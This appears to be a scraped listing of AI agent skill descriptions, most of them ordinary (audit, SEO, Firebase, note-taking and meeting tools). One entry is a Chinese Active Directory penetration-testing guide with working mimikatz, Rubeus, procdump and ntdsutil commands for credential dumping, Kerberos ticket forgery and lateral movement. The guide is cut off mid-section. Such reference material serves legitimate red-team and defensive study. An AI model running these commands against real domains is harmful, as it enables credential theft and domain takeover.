全部能力

Senior ISMS Audit Expert for internal and external information security management system auditing. Provides ISO 27001 audit expertise, security audit program…

Automatic quality control, linting, and static analysis procedures. Use after every code modification to ensure syntax correctness and project standards.…

Build with Firebase Cloud Storage - file uploads, downloads, and secure access. Use when: uploading images/files, generating download URLs, implementing file pickers, setting up storage security rules, or troubleshooting storage/unauthorized, cors errors, quota exceeded, or upload failed errors. Prevents 9 documented errors.

Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务，需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限，注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD

Technical SEO auditor and fixer. Runs Lighthouse/PageSpeed audits on websites or local dev servers, analyzes SEO/performance/accessibility scores, and…

阿里云 DNS CLI 技能的最小化冒烟测试。验证 aliyun-cli 认证和 describe-subdomain 流程。

You are a security expert specializing in dependency vulnerability analysis, SBOM generation, and supply chain security. Scan project dependencies across…

Manage authentication for Get笔记 CLI

Load all open issues from GitHub and save them as markdown files

Semantic search across notes in Get笔记 via the getnote CLI

飞书视频会议与妙记操作。多维搜索历史会议、获取会议纪要/AI 产物/逐字稿、 查询会议录制、下载妙记媒体文件。支持 meeting-ids / minute-tokens / calendar-event-ids 三路径入口。当用户请求"搜索会议"、"会议记录"、"会议纪要"、"逐字稿"、"妙记"、"meeting"、 "vc search"、"vc recording"、"minutes"、"下载妙记"、"妙记视频"、"会议录制"、 "从日程找会议"时使用。

Manage evidence freshness by identifying stale decisions and providing governance actions

Senior QMS Audit Expert for internal and external quality management system auditing. Provides ISO 13485 audit expertise, audit program management,…

Find bugs, security vulnerabilities, and code quality issues in local branch changes. Use when asked to review changes, find bugs, security review, or audit…

Search the FPF knowledge base and display hypothesis details with assurance information

You are a compliance expert specializing in regulatory requirements for software systems including GDPR, HIPAA, SOC2, PCI-DSS, and other industry standards.…

Manage note tags in Get笔记 via the getnote CLI

Manage knowledge bases in Get笔记 via the getnote CLI

Build comprehensive attack trees to visualize threat paths. Use when mapping attack scenarios, identifying defense gaps, or communicating security risks to…

You are a dependency security expert specializing in vulnerability scanning, license compliance, and supply chain security. Analyze project dependencies for…